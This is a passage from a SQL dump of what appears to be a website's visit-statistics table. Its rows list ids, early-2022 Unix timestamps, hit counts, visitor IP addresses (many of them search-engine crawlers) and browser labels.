'95.108.213.27','other'),(561654,1643122157,3,3,0,0,'5.255.253.117','other'),(561655,1643122367,4,4,0,0,'87.250.224.63','other'),(561656,1643122405,1,1,0,0,'213.180.203.12','other'),(561657,1643135285,1,1,0,0,'5.45.207.134','other'),(561658,1643139204,1,1,0,0,'213.180.203.184','other'),(561659,1643144091,1,1,0,0,'31.129.228.15','chrome'),(561660,1643147826,1,1,0,0,'80.93.124.43','other'),(561661,1643152872,1,1,0,0,'168.119.126.174','other'),(561662,1643156930,1,1,0,0,'87.250.224.17','other'),(561663,1643162593,1,1,0,0,'87.250.224.200','other'),(561664,1643165380,1,1,0,0,'87.250.224.91','other'),(561665,1643171928,1,1,0,0,'66.249.66.57','chrome'),(561666,1643173326,1,0,1,0,'66.249.66.57',''),(561667,1643176436,2,2,0,0,'194.38.20.161','other'),(561668,1643177762,1,1,0,0,'141.8.142.70','other'),(561669,1643180035,1,1,0,0,'66.249.66.57','chrome'),(561670,1643180794,2,2,0,0,'194.38.20.161','other'),(561671,1643182162,1,1,0,0,'66.249.66.57','chrome'),(561672,1643184836,1,1,0,0,'194.38.20.161','other'),(561673,1643185949,1,1,0,0,'141.8.142.70','other'),(561674,1643187909,1,1,0,0,'194.38.20.161','other'),(561675,1643190207,1,1,0,0,'213.180.203.75','other'),(561676,1643192270,1,1,0,0,'194.38.20.161','other'),(561677,1643198654,1,1,0,0,'213.180.203.23','other'),(561678,1643199597,2,2,0,0,'194.38.20.161','other'),(561679,1643201998,1,0,1,0,'66.249.66.61',''),(561680,1643204812,1,1,0,0,'31.13.127.117','other'),(561681,1643204813,1,1,0,0,'31.13.127.11','other'),(561682,1643204814,1,1,0,0,'31.13.127.23','other'),(561683,1643204815,1,1,0,0,'31.13.103.1','other'),(561684,1643205006,1,1,0,0,'217.196.161.92','chrome'),(561685,1643222558,1,1,0,0,'5.255.253.162','other'),(561686,1643222663,1,1,0,0,'141.8.142.88','other'),(561687,1643227571,1,1,0,0,'95.79.143.116','firefox'),(561688,1643229332,5,5,0,0,'207.46.13.30','other'),(561689,1643229427,1,1,0,0,'207.46.13.82','other'),(561690,1643241168,1,1,0,0,'95.108.213.35','other'),(561691,1643242731,1,1,0,0,'95.108.213.35','other'),(561692,1643249385,1,1,0,0,'5.45.207.134','other'),(561693,1643253454,1,1,0,0,'213.180.203.75','other'),(561694,1643254045,1,1,0,0,'194.38.20.161','other'),(561695,1643257303,2,2,0,0,'45.149.83.247','chrome'),(561696,1643257626,5,5,0,0,'46.101.78.214','chrome'),(561697,1643260754,1,0,1,0,'66.249.66.61',''),(561698,1643261610,1,1,0,0,'141.8.142.88','other'),(561699,1643261647,1,1,0,0,'141.8.142.70','other'),(561700,1643261651,1,1,0,0,'5.45.207.141','other'),(561701,1643261654,1,1,0,0,'95.108.213.60','other'),(561702,1643261657,1,1,0,0,'87.250.224.99','other'),(561703,1643261660,1,1,0,0,'87.250.224.147','other'),(561704,1643261663,1,1,0,0,'141.8.142.87','other'),(561705,1643261666,2,2,0,0,'5.255.253.148','other'),(561706,1643261668,1,1,0,0,'87.250.224.112','other'),(561707,1643261671,1,1,0,0,'5.255.253.185','other'),(561708,1643261674,1,1,0,0,'141.8.142.72','other'),(561709,1643261693,2,2,0,0,'87.250.224.26','other'),(561710,1643261771,2,2,0,0,'213.180.203.96','other'),(561711,1643261808,1,1,0,0,'87.250.224.63','other'),(561712,1643262488,1,1,0,0,'66.249.66.57','chrome'),(561713,1643264361,1,1,0,0,'5.45.207.139','other'),(561714,1643265681,1,1,0,0,'34.214.123.136','chrome'),(561715,1643267933,1,1,0,0,'194.38.20.161','other'),(561716,1643268077,1,1,0,0,'87.250.224.26','other'),(561717,1643268509,1,1,0,0,'87.250.224.6','other'),(561718,1643269144,1,1,0,0,'95.79.126.223','other'),(561719,1643273483,1,1,0,0,'87.250.224.6','other'),(561720,1643276011,1,1,0,0,'95.79.132.225','chrome'),(561721,1643277357,1,1,0,0,'176.100.8.204','chrome'),(561722,1643278885,1,1,0,0,'194.38.20.161','other'),(561723,1643280454,1,1,0,0,'66.249.66.61','chrome'),(561724,1643284122,1,1,0,0,'95.79.132.225','chrome'),(561725,1643284280,1,1,0,0,'87.250.224.88','other'),(561726,1643285368,5,5,0,0,'2.58.149.240','chrome'),(561727,1643289727,1,1,0,0,'213.180.203.75','other'),(561728,1643300167,1,1,0,0,'66.249.66.57','chrome'),(561729,1643302176,1,1,0,0,'141.8.142.87','other'),(561730,1643308261,1,1,0,0,'207.46.13.30','other'),(561731,1643311059,1,0,1,0,'66.249.66.61',''),(561732,1643315238,1,1,0,0,'5.45.207.134','other'),(561733,1643323820,1,1,0,0,'141.8.142.88','other'),(561734,1643324959,1,1,0,0,'5.45.207.141','other'),(561735,1643332189,1,1,0,0,'5.255.253.189','other'),(561736,1643335610,1,1,0,0,'5.45.207.140','other'),(561737,1643343805,1,1,0,0,'176.31.28.226','chrome'),(561738,1643343806,1,1,0,0,'176.31.28.226','other'),(561739,1643352720,2,2,0,0,'66.249.66.59','chrome'),(561740,1643355138,1,1,0,0,'66.249.66.59','chrome'),(561741,1643355192,1,1,0,0,'66.249.66.57','chrome'),(561742,1643355890,2,2,0,0,'66.249.66.61','chrome'),(561743,1643356412,1,1,0,0,'66.249.66.59','chrome'),(561744,1643356839,1,1,0,0,'66.249.66.57','chrome'),(561745,1643357157,1,1,0,0,'5.255.253.112','other'),(561746,1643360057,1,0,1,0,'66.249.66.59',''),(561747,1643360174,1,1,0,0,'95.108.213.35','other'),(561748,1643361072,1,1,0,0,'87.250.224.147','other'),(561749,1643363232,1,1,0,0,'87.250.224.112','other'),(561750,1643364760,1,1,0,0,'66.249.66.57','chrome'),(561751,1643365719,1,1,0,0,'66.249.66.59','chrome'),(561752,1643370356,1,1,0,0,'66.249.66.61','chrome'),(561753,1643377705,1,1,0,0,'213.180.203.82','other'),(561754,1643380402,2,2,0,0,'136.144.41.9','firefox'),(561755,1643381710,1,1,0,0,'213.180.203.82','other'),(561756,1643387262,1,1,0,0,'5.45.207.139','other'),(561757,1643389924,1,1,0,0,'87.250.224.68','other'),(561758,1643390792,1,1,0,0,'207.46.13.61','other'),(561759,1643395785,1,1,0,0,'66.249.66.59','chrome'),(561760,1643395893,1,1,0,0,'194.38.20.161','other'),(561761,1643397379,1,0,1,0,'66.249.66.59',''),(561762,1643401016,2,2,0,0,'66.249.81.142','chrome'),(561763,1643401018,1,1,0,0,'95.46.104.149','chrome'),(561764,1643401319,1,1,0,0,'66.249.81.140','chrome'),(561765,1643402506,1,1,0,0,'141.8.142.70','other'),(561766,1643405944,2,2,0,0,'136.144.41.9','firefox'),(561767,1643419396,1,1,0,0,'66.249.66.61','chrome'),(561768,1643422504,1,1,0,0,'87.250.224.94','other'),(561769,1643431334,1,1,0,0,'66.249.66.61','chrome'),(561770,1643432264,1,1,0,0,'87.250.224.20','other'),(561771,1643436028,1,1,0,0,'31.13.103.12','other'),(561772,1643436029,1,1,0,0,'31.13.103.120','other'),(561773,1643437844,1,1,0,0,'91.196.178.135','chrome'),(561774,1643439233,1,1,0,0,'5.255.231.246','other'),(561775,1643444048,1,1,0,0,'66.249.66.59','chrome'),(561776,1643444145,2,2,0,0,'66.249.66.61','chrome'),(561777,1643445357,1,0,1,0,'66.249.66.57',''),(561778,1643445560,1,1,0,0,'66.249.66.61','chrome'),(561779,1643448343,1,1,0,0,'95.79.90.12','chrome'),(561780,1643450392,1,0,1,0,'66.249.66.59',''),(561781,1643451286,1,0,1,0,'66.249.66.57',''),(561782,1643452011,1,1,0,0,'173.252.79.116','other'),(561783,1643452371,2,2,0,0,'66.249.66.59','chrome'),(561784,1643452650,1,0,1,0,'66.249.66.57',''),(561785,1643453366,1,1,0,0,'95.79.191.25','firefox'),(561786,1643454352,1,1,0,0,'66.220.149.11','other'),(561787,1643454403,1,1,0,0,'141.8.142.87','other'),(561788,1643455842,1,1,0,0,'213.180.203.68','other'),(561789,1643457417,1,1,0,0,'31.13.103.119','other'),(561790,1643461953,1,1,0,0,'66.249.66.57','chrome'),(561791,1643465769,1,1,0,0,'5.255.231.246','other'),(561792,1643467454,4,4,0,0,'109.70.111.112','chrome'),(561793,1643467876,1,1,0,0,'213.180.203.12','other'),(561794,1643470372,1,1,0,0,'87.250.224.8','other'),(561795,1643472998,1,1,0,0,'87.250.224.26','other'),(561796,1643474341,1,1,0,0,'66.249.66.197','chrome'),(561797,1643479436,1,0,1,0,'66.249.66.159',''),(561798,1643479817,1,1,0,0,'5.255.253.185','other'),(561799,1643483824,1,0,1,0,'66.249.66.84',''),(561800,1643490526,1,1,0,0,'5.45.207.140','other'),(561801,1643498721,1,1,0,0,'54.196.228.25','chrome'),(561802,1643498725,1,1,0,0,'54.196.228.25','other'),(561803,1643499137,1,1,0,0,'95.108.213.74','other'),(561804,1643500697,1,1,0,0,'37.73.164.106','chrome'),(561805,1643502845,1,1,0,0,'45.129.18.132','chrome'),(561806,1643506110,1,1,0,0,'207.46.13.82','other'),(561807,1643506285,1,1,0,0,'207.46.13.61','other'),(561808,1643510724,21,21,0,0,'3.93.9.92','chrome'),(561809,1643516486,1,1,0,0,'5.255.231.246','other'),(561810,1643516516,1,1,0,0,'176.31.28.244','other'),(561811,1643516518,1,1,0,0,'176.31.28.244','chrome'),(561812,1643518589,1,1,0,0,'109.70.106.130','other'),(561813,1643520585,1,1,0,0,'95.108.213.28','other'),(561814,1643525893,1,1,0,0,'104.236.120.31','firefox'),(561815,1643528691,1,1,0,0,'157.55.39.166','other'),(561816,1643529361,1,1,0,0,'66.249.66.59','chrome'),(561817,1643532165,2,2,0,0,'20.121.213.147','firefox'),(561818,1643532787,1,1,0,0,'66.249.66.57','chrome'),(561819,1643536649,5,5,0,0,'64.227.174.84','chrome'),(561820,1643542550,1,1,0,0,'66.249.66.57','chrome'),(561821,1643543426,1,1,0,0,'95.108.213.28','other'),(561822,1643544131,1,1,0,0,'66.249.66.59','chrome'),(561823,1643547732,1,1,0,0,'194.38.20.161','other'),(561824,1643549886,1,1,0,0,'66.249.66.57','chrome'),(561825,1643550961,1,1,0,0,'5.45.207.140','other'),(561826,1643561015,1,1,0,0,'114.119.152.134','other'),(561827,1643561810,5,5,0,0,'138.197.144.186','chrome'),(561828,1643568705,1,0,1,0,'66.249.66.59',''),(561829,1643575612,1,1,0,0,'213.180.203.68','other'),(561830,1643577244,1,1,0,0,'165.227.212.146','other'),(561831,1643585270,1,1,0,0,'54.163.12.253','chrome'),(561832,1643585274,1,1,0,0,'54.163.12.253','other'),(561833,1643589155,2,2,0,0,'136.144.41.9','firefox'),(561834,1643590674,1,1,0,0,'207.46.13.82','other'),(561835,1643592429,1,1,0,0,'66.249.66.61','chrome'),(561836,1643595295,1,1,0,0,'5.255.253.167','other'),(561837,1643603007,2,2,0,0,'176.31.28.226','chrome'),(561838,1643607405,1,1,0,0,'66.249.66.59','chrome'),(561839,1643619922,1,1,0,0,'31.13.127.38','other'),(561840,1643619923,1,1,0,0,'31.13.127.116','other'),(561841,1643624429,1,1,0,0,'31.13.127.18','other'),(561842,1643624723,1,1,0,0,'66.249.66.61','chrome'),(561843,1643627877,1,1,0,0,'66.249.66.59','chrome'),(561844,1643630188,1,1,0,0,'66.249.66.57','chrome'),(561845,1643633627,1,1,0,0,'5.255.253.117','other'),(561846,1643635221,1,1,0,0,'185.237.217.11','chrome'),(561847,1643636562,1,1,0,0,'66.249.66.57','chrome'),(561848,1643641383,1,1,0,0,'95.79.135.232','chrome'),(561849,1643642423,1,1,0,0,'91.196.178.169','chrome'),(561850,1643643037,1,1,0,0,'66.249.66.59','chrome'),(561851,1643643175,1,1,0,0,'91.196.178.169','other'),(561852,1643643598,1,1,0,0,'66.249.66.61','chrome'),(561853,1643646953,1,1,0,0,'95.79.240.154','firefox'),(561854,1643648702,1,1,0,0,'76.72.172.171','firefox'),(561855,1643650745,1,1,0,0,'176.105.200.12','chrome'),(561856,1643652308,2,2,0,0,'162.142.125.210','other'),(561857,1643652314,1,1,0,0,'95.79.203.225','chrome'),(561858,1643654894,1,0,1,0,'66.249.66.57',''),(561859,1643659077,1,1,0,0,'46.211.111.195','chrome'),(561860,1643668913,1,1,0,0,'207.46.13.82','other'),(561861,1643669041,1,1,0,0,'157.55.39.166','other'),(561862,1643672239,1,1,0,0,'66.249.66.61','chrome'),(561863,1643678778,1,1,0,0,'109.234.161.216','firefox'),(561864,1643682814,1,1,0,0,'66.249.66.57','chrome'),(561865,1643689364,2,2,0,0,'147.135.225.157','chrome'),(561866,1643696521,1,1,0,0,'91.196.178.169','chrome'),(561867,1643700908,1,1,0,0,'91.196.178.169','chrome'),(561868,1643702647,2,2,0,0,'91.196.178.169','chrome'),(561869,1643705607,2,2,0,0,'91.196.178.169','chrome'),(561870,1643707766,5,5,0,0,'178.62.243.197','chrome'),(561871,1643708112,1,1,0,0,'87.250.224.63','other'),(561872,1643709543,1,1,0,0,'91.196.178.169','chrome'),(561873,1643713605,1,1,0,0,'194.38.20.161','other'),(561874,1643718259,4,4,0,0,'144.91.106.14','chrome'),(561875,1643731386,1,1,0,0,'66.249.66.57','chrome'),(561876,1643733866,1,1,0,0,'95.79.216.94','chrome'),(561877,1643741272,1,0,1,0,'66.249.66.61',''),(561878,1643758580,1,1,0,0,'66.249.66.59','chrome'),(561879,1643775758,1,1,0,0,'176.31.28.244','opera'),(561880,1643775759,1,1,0,0,'176.31.28.244','other'),(561881,1643780843,1,1,0,0,'66.249.66.59','chrome'),(561882,1643782818,1,1,0,0,'66.249.66.57','chrome'),(561883,1643787674,1,1,0,0,'66.249.66.61','chrome'),(561884,1643787717,1,1,0,0,'66.249.66.57','chrome'),(561885,1643789754,2,2,0,0,'91.196.178.51','chrome'),(561886,1643789810,4,4,0,0,'87.250.224.63','other'),(561887,1643790006,1,1,0,0,'213.180.203.12','other'),(561888,1643792111,33,33,0,0,'51.91.7.5','firefox'),(561889,1643802702,1,1,0,0,'66.249.66.61','chrome'),(561890,1643808452,1,1,0,0,'91.196.178.51','chrome'),(561891,1643808646,1,1,0,0,'87.250.224.63','other'),(561892,1643814064,1,1,0,0,'66.249.66.57','chrome'),(561893,1643814615,2,2,0,0,'54.166.5.0','firefox'),(561894,1643817493,2,0,2,0,'66.249.66.59',''),(561895,1643818011,1,1,0,0,'66.249.66.61','chrome'),(561896,1643829145,1,1,0,0,'52.190.13.78','firefox'),(561897,1643831696,1,1,0,0,'167.71.193.214','firefox'),(561898,1643840469,3,3,0,0,'20.116.23.82','other'),(561899,1643842281,1,1,0,0,'176.97.0.129','other'),(561900,1643847843,1,1,0,0,'194.38.20.161','other'),(561901,1643852845,1,1,0,0,'66.249.66.61','chrome'),(561902,1643856118,1,0,1,0,'66.249.66.9',''),(561903,1643862135,1,1,0,0,'45.149.83.238','chrome'),(561905,1643863398,1,1,0,0,'66.249.66.5','chrome'),(561906,1643881249,1,1,0,0,'95.79.202.212','chrome'),(561907,1643881839,1,1,0,0,'204.12.198.246','chrome'),(561908,1643886017,1,1,0,0,'66.249.66.61','chrome'),(561909,1643887621,1,1,0,0,'66.249.66.57','chrome'),(561910,1643889661,1,1,0,0,'95.79.222.117','chrome'),(561911,1643889707,1,1,0,0,'66.249.66.57','chrome'),(561912,1643897780,1,1,0,0,'178.133.124.190','chrome'),(561913,1643902780,1,1,0,0,'95.79.175.230','chrome'),(561914,1643903442,1,0,1,0,'66.249.66.57',''),(561915,1643907858,1,1,0,0,'66.249.66.9','chrome'),(561916,1643907958,1,1,0,0,'95.79.85.148','chrome'),(561917,1643914068,1,1,0,0,'95.79.85.148','firefox'),(561918,1643914091,2,2,0,0,'167.248.133.63','other'),(561919,1643917210,1,1,0,0,'66.249.66.61','chrome'),(561920,1643917578,1,1,0,0,'173.252.111.22','other'),(561921,1643917579,1,1,0,0,'173.252.111.23','other'),(561922,1643919730,1,1,0,0,'95.79.126.224','firefox'),(561923,1643920087,1,0,1,0,'66.249.66.61',''),(561924,1643920301,1,1,0,0,'66.249.66.57','chrome'),(561925,1643931286,1,1,0,0,'207.46.13.61','other'),(561926,1643935105,1,1,0,0,'52.190.13.78','firefox'),(561927,1643948542,2,2,0,0,'176.31.28.226','other'),(561928,1643950323,1,1,0,0,'207.46.13.61','other'),(561929,1643952862,1,1,0,0,'185.237.217.11','chrome'),(561930,1643958510,1,1,0,0,'95.79.86.79','chrome'),(561931,1643959015,1,0,1,0,'66.249.66.57',''),(561932,1643962581,1,1,0,0,'95.79.192.61','firefox'),(561933,1643963929,1,1,0,0,'66.249.66.61','chrome'),(561934,1643965812,1,1,0,0,'66.249.66.59','chrome'),(561935,1643967393,1,1,0,0,'95.79.195.114','chrome'),(561936,1643971531,1,1,0,0,'95.79.142.42','firefox'),(561937,1643975526,1,1,0,0,'95.79.190.18','firefox'),(561938,1643983282,1,1,0,0,'194.38.20.161','other'),(561939,1643983331,1,1,0,0,'173.252.79.15','other'),(561940,1643989382,1,0,1,0,'66.249.66.57',''),(561941,1643998911,1,1,0,0,'31.13.127.36','other'),(561942,1643998912,1,1,0,0,'31.13.127.7','other'),(561943,1644003161,1,1,0,0,'66.249.66.59','chrome'),(561944,1644016670,1,1,0,0,'66.249.66.59','chrome'),(561945,1644018661,1,1,0,0,'66.249.66.59','chrome'),(561946,1644022897,1,1,0,0,'157.55.39.188','other'),(561947,1644034605,1,0,1,0,'66.249.66.61',''),(561948,1644035057,2,2,0,0,'147.135.225.157','chrome'),(561949,1644044901,1,1,0,0,'62.64.89.117','chrome'),(561950,1644045431,1,1,0,0,'66.249.66.57','chrome'),(561951,1644049306,1,1,0,0,'66.249.66.61','chrome'),(561952,1644051181,1,0,1,0,'66.249.66.57',''),(561953,1644051189,1,1,0,0,'66.249.66.59','chrome'),(561954,1644051753,1,1,0,0,'69.171.249.116','other'),(561955,1644051754,1,1,0,0,'69.171.249.1','other'),(561956,1644055520,1,1,0,0,'66.249.66.61','chrome'),(561957,1644058336,1,1,0,0,'157.55.39.188','other'),(561958,1644061305,2,2,0,0,'47.88.19.156','chrome'),(561959,1644064181,1,1,0,0,'185.237.217.11','chrome'),(561960,1644069150,1,1,0,0,'66.249.66.61','chrome'),(561961,1644078362,1,0,1,0,'66.249.66.61',''),(561962,1644081146,1,1,0,0,'87.250.224.58','other'),(561963,1644082261,1,1,0,0,'176.105.200.186','chrome'),(561964,1644087059,1,0,1,0,'66.249.66.57',''),(561965,1644102288,1,1,0,0,'161.35.135.217','other'),(561966,1644105258,1,1,0,0,'138.197.111.156','other'),(561967,1644111376,1,1,0,0,'157.55.39.188','other'),(561968,1644121105,1,1,0,0,'81.16.140.232','other'),(561969,1644121107,1,1,0,0,'81.16.140.232','chrome'),(561970,1644125837,1,1,0,0,'3.250.40.155','chrome'),(561971,1644129846,1,1,0,0,'68.183.245.101','firefox'),(561972,1644129850,1,1,0,0,'68.183.245.101','chrome'),(561973,1644129908,1,0,1,0,'66.249.66.61',''),(561974,1644129992,2,2,0,0,'150.143.151.130','firefox'),(561975,1644129993,1,1,0,0,'92.40.169.52','chrome'),(561977,1644129994,1,1,0,0,'104.244.210.56','other'),(561978,1644130005,1,1,0,0,'45.221.68.130','other'),(561979,1644130608,1,1,0,0,'161.35.253.31','chrome'),(561980,1644130809,1,1,0,0,'37.19.218.6','other'),(561982,1644130816,1,1,0,0,'199.217.104.230','other'),(561984,1644132638,1,1,0,0,'194.38.20.161','other'),(561985,1644133210,1,0,1,0,'66.249.66.61',''),(561986,1644133770,1,1,0,0,'164.90.241.135','chrome'),(561987,1644133771,1,1,0,0,'128.90.172.22','other'),(561990,1644133773,1,1,0,0,'38.101.74.25','other'),(561991,1644133975,1,1,0,0,'161.35.246.138','other'),(561992,1644133976,1,1,0,0,'37.19.218.6','chrome'),(561994,1644133977,1,1,0,0,'212.102.57.79','other'),(561995,1644135410,1,1,0,0,'66.249.66.61','chrome'),(561996,1644136061,1,1,0,0,'95.79.139.242','chrome'),(561997,1644137197,1,1,0,0,'3.8.177.131','firefox'),(561998,1644137199,1,1,0,0,'161.35.246.138','other'),(562001,1644139526,1,1,0,0,'66.249.66.59','chrome'),(562002,1644140569,1,1,0,0,'66.249.66.59','chrome'),(562003,1644142582,1,1,0,0,'95.79.139.242','firefox'),(562004,1644146577,2,2,0,0,'45.87.91.63','chrome'),(562005,1644155468,1,1,0,0,'157.55.39.188','other'),(562006,1644157665,1,1,0,0,'176.105.200.252','chrome'),(562007,1644167707,1,1,0,0,'66.249.66.59','chrome'),(562008,1644171357,1,1,0,0,'66.249.66.61','chrome'),(562009,1644171632,1,1,0,0,'184.94.240.92','firefox'),(562010,1644174261,1,1,0,0,'69.171.249.17','other'),(562011,1644174409,1,1,0,0,'173.252.111.21','other'),(562012,1644174476,1,1,0,0,'173.252.111.25','other'),(562013,1644174544,1,1,0,0,'173.252.111.23','other'),(562014,1644174653,1,1,0,0,'31.13.127.25','other'),(562015,1644174654,1,1,0,0,'31.13.127.24','other'),(562016,1644174779,1,1,0,0,'66.220.149.28','other'),(562017,1644174780,1,1,0,0,'66.220.149.16','other'),(562018,1644175983,1,0,1,0,'66.249.66.59',''),(562019,1644186195,1,0,1,0,'66.249.66.57',''),(562020,1644186200,1,0,1,0,'66.249.66.59',''),(562021,1644186542,1,1,0,0,'184.94.240.92','firefox'),(562022,1644207497,1,1,0,0,'195.245.111.241','firefox'),(562023,1644207498,1,1,0,0,'195.245.111.241','other'),(562024,1644218955,1,1,0,0,'66.249.66.59','chrome'),(562025,1644227480,1,1,0,0,'91.196.178.118','chrome'),(562026,1644236172,1,1,0,0,'91.196.178.118','chrome'),(562027,1644245520,1,1,0,0,'157.55.39.188','other'),(562028,1644250691,1,1,0,0,'194.38.20.161','other'),(562029,1644262150,1,0,1,0,'66.249.66.57',''),(562030,1644280940,1,0,1,0,'66.249.66.37',''),(562031,1644292016,1,1,0,0,'193.151.131.43','firefox'),(562032,1644293080,1,1,0,0,'66.249.66.59','chrome'),(562033,1644293919,1,1,0,0,'195.245.111.214','msie'),(562034,1644293921,1,1,0,0,'195.245.111.214','chrome'),(562035,1644297144,1,1,0,0,'5.45.207.111','other'),(562036,1644297148,1,1,0,0,'5.255.253.104','other'),(562037,1644297253,1,1,0,0,'157.55.39.139','other'),(562038,1644297317,1,1,0,0,'66.249.66.59','chrome'),(562039,1644301440,1,1,0,0,'157.55.39.117','other'),(562040,1644301728,2,1,1,0,'66.249.66.59',''),(562041,1644302273,1,1,0,0,'103.209.67.101','chrome'),(562042,1644308035,1,1,0,0,'46.211.158.143','chrome'),(562043,1644309388,2,2,0,0,'207.46.13.5','other'),(562044,1644324713,1,0,1,0,'66.249.66.59',''),(562045,1644338900,1,1,0,0,'184.168.115.128','firefox'),(562046,1644342679,1,1,0,0,'66.249.66.57','chrome'),(562047,1644343760,1,1,0,0,'66.249.66.59','chrome'),(562048,1644344364,1,1,0,0,'31.13.127.17','other'),(562049,1644344365,1,1,0,0,'31.13.127.9','other'),(562050,1644346115,1,1,0,0,'66.249.66.61','chrome'),(562051,1644348789,1,1,0,0,'66.249.66.59','chrome'),(562052,1644355267,2,0,2,0,'66.249.66.61',''),(562053,1644380320,2,2,0,0,'195.245.111.241','chrome'),(562054,1644385382,1,1,0,0,'184.168.101.89','firefox'),(562055,1644385883,1,0,1,0,'66.249.66.59',''),(562056,1644387565,1,1,0,0,'87.250.224.58','other'),(562057,1644396276,1,1,0,0,'194.38.20.161','other'),(562058,1644399986,1,1,0,0,'66.249.66.59','chrome'),(562059,1644410686,1,1,0,0,'45.129.18.16','chrome'),(562060,1644410687,1,1,0,0,'45.129.18.43','chrome'),(562061,1644415011,1,1,0,0,'216.145.11.94','firefox'),(562062,1644415632,1,0,1,0,'66.249.66.59',''),(562063,1644418665,1,1,0,0,'66.249.66.59','chrome'),(562064,1644419988,1,1,0,0,'66.249.66.57','chrome'),(562065,1644422005,1,1,0,0,'66.249.66.59','chrome'),(562066,1644422658,1,1,0,0,'87.250.224.58','other'),(562067,1644424766,1,0,1,0,'66.249.66.57',''),(562068,1644429766,1,1,0,0,'66.249.66.57','chrome'),(562069,1644431127,1,1,0,0,'66.249.66.57','chrome'),(562070,1644432501,1,1,0,0,'207.46.13.5','other'),(562071,1644450575,1,1,0,0,'66.249.66.57','chrome'),(562072,1644455847,1,1,0,0,'207.46.13.5','other'),(562073,1644455953,1,1,0,0,'157.55.39.17','other'),(562074,1644455956,1,1,0,0,'157.55.39.117','other'),(562075,1644455962,1,1,0,0,'157.55.39.14','other'),(562076,1644462289,1,1,0,0,'107.150.57.37','chrome'),(562077,1644466726,1,1,0,0,'81.16.140.232','other'),(562079,1644478781,1,0,1,0,'66.249.66.59',''),(562080,1644480180,1,1,0,0,'66.249.66.61','chrome'),(562081,1644488885,1,1,0,0,'5.45.207.103','other'),(562082,1644490605,1,1,0,0,'5.255.253.182','other'),(562083,1644512478,1,1,0,0,'91.196.178.210','chrome'),(562084,1644520547,1,1,0,0,'194.38.20.161','other'),(562085,1644527380,1,1,0,0,'66.249.66.57','chrome'),(562086,1644528434,2,0,2,0,'66.249.66.59',''),(562087,1644553111,1,1,0,0,'195.245.111.214','chrome'),(562089,1644558447,1,1,0,0,'66.249.66.57','chrome'),(562090,1644559501,1,1,0,0,'66.249.66.57','chrome'),(562091,1644567180,1,0,1,0,'66.249.66.57',''),(562092,1644569529,1,1,0,0,'207.46.13.5','other'),(562093,1644577724,1,0,1,0,'66.249.66.59',''),(562094,1644578741,1,1,0,0,'173.252.79.4','other'),(562095,1644600472,1,1,0,0,'87.250.224.95','other'),(562096,1644600512,1,1,0,0,'87.250.224.190','other'),(562097,1644600516,1,1,0,0,'5.45.207.124','other'),(562098,1644601672,1,1,0,0,'31.13.127.14','other'),(562099,1644601673,1,1,0,0,'31.13.127.29','other'),(562100,1644602796,1,1,0,0,'167.94.138.60','other'),(562101,1644602797,1,1,0,0,'167.94.138.60','other'),(562102,1644605660,1,1,0,0,'66.249.66.57','chrome'),(562103,1644607806,1,0,1,0,'66.249.66.59',''),(562104,1644614474,1,0,1,0,'66.249.66.61',''),(562105,1644617056,1,1,0,0,'66.249.92.57','other'),(562106,1644639519,1,1,0,0,'195.245.111.241','chrome'),(562107,1644639520,1,1,0,0,'195.245.111.241','firefox'),(562108,1644652338,1,1,0,0,'95.108.213.11','other'),(562109,1644665139,1,1,0,0,'157.55.39.117','other'),(562110,1644665537,1,1,0,0,'69.171.249.23','other'),(562111,1644671996,1,1,0,0,'3.96.48.221','firefox'),(562112,1644679654,1,1,0,0,'194.38.20.161','other'),(562113,1644685445,1,1,0,0,'157.55.39.117','other'),(562114,1644689068,1,1,0,0,'66.248.204.67','chrome'),(562115,1644695095,1,1,0,0,'5.45.207.108','other'),(562116,1644700810,1,0,1,0,'66.249.66.59',''),(562117,1644701329,1,1,0,0,'5.45.207.126','other'),(562118,1644702978,2,2,0,0,'91.211.251.49','other'),(562119,1644706420,2,2,0,0,'91.211.251.49','other'),(562120,1644709526,1,1,0,0,'157.55.39.148','other'),(562121,1644710201,1,1,0,0,'91.211.251.49','other'),(562122,1644712085,2,2,0,0,'91.211.251.49','other'),(562123,1644714406,1,1,0,0,'91.211.251.49','other'),(562124,1644719116,1,1,0,0,'91.211.251.49','other'),(562125,1644725914,2,2,0,0,'81.16.140.232','chrome'),(562126,1644730728,1,1,0,0,'87.250.224.58','other'),(562127,1644736276,1,1,0,0,'91.196.178.24','chrome'),(562128,1644749308,1,1,0,0,'87.250.224.58','other'),(562129,1644751766,1,0,1,0,'66.249.66.61',''),(562130,1644751989,1,1,0,0,'87.250.224.58','other'),(562131,1644760664,8,8,0,0,'87.250.224.58','other'),(562132,1644760945,1,1,0,0,'66.249.66.61','chrome'),(562133,1644786531,1,1,0,0,'157.55.39.17','other'),(562134,1644798736,1,1,0,0,'66.249.66.57','chrome'),(562135,1644812289,2,2,0,0,'45.129.198.217','chrome'),(562136,1644819230,1,1,0,0,'129.88.46.51','chrome'),(562137,1644820105,1,1,0,0,'194.38.20.161','other'),(562138,1644830947,1,0,1,0,'66.249.66.57',''),(562139,1644831018,1,1,0,0,'69.171.249.119','other'),(562140,1644831019,1,1,0,0,'69.171.249.9','other'),(562141,1644837110,1,1,0,0,'66.249.66.61','chrome'),(562142,1644862619,2,2,0,0,'185.237.217.11','chrome'),(562143,1646581470,1,1,0,0,'103.50.76.37','firefox'),(562144,1646586071,1,1,0,0,'194.44.192.206','chrome'),(562145,1646591640,1,1,0,0,'185.237.217.11','chrome'),(562146,1646595701,1,1,0,0,'178.133.221.237','chrome'),(562147,1646595738,1,1,0,0,'88.155.1.220','other'),(562148,1646595814,1,1,0,0,'91.196.178.12','chrome'),(562149,1646595815,1,1,0,0,'46.211.1.222','chrome'),(562150,1646595900,1,1,0,0,'94.254.185.92','chrome'),(562151,1646596615,1,1,0,0,'178.133.48.184','chrome'),(562152,1646596676,1,1,0,0,'46.211.147.142','chrome'),(562153,1646596922,1,1,0,0,'185.237.217.11','chrome'),(562154,1646597085,1,1,0,0,'91.196.178.60','chrome'),(562155,1646597593,1,1,0,0,'46.211.22.4','chrome'),(562156,1646598184,1,1,0,0,'54.36.110.228','firefox'),(562157,1646598650,1,1,0,0,'46.211.110.113','chrome'),(562158,1646598746,2,2,0,0,'196.206.168.215','firefox'),(562159,1646598797,1,1,0,0,'92.118.160.9','other'),(562160,1646600139,1,1,0,0,'188.239.55.165','chrome'),(562161,1646600469,1,1,0,0,'146.70.82.156','chrome'),(562162,1646600590,1,1,0,0,'185.237.217.27','chrome'),(562163,1646604213,1,1,0,0,'46.211.240.27','chrome'),(562164,1646610811,1,1,0,0,'185.237.217.11','chrome'),(562165,1646615259,1,1,0,0,'188.163.101.111','chrome'),(562166,1646626709,2,2,0,0,'195.245.111.214','chrome'),(562167,1646628658,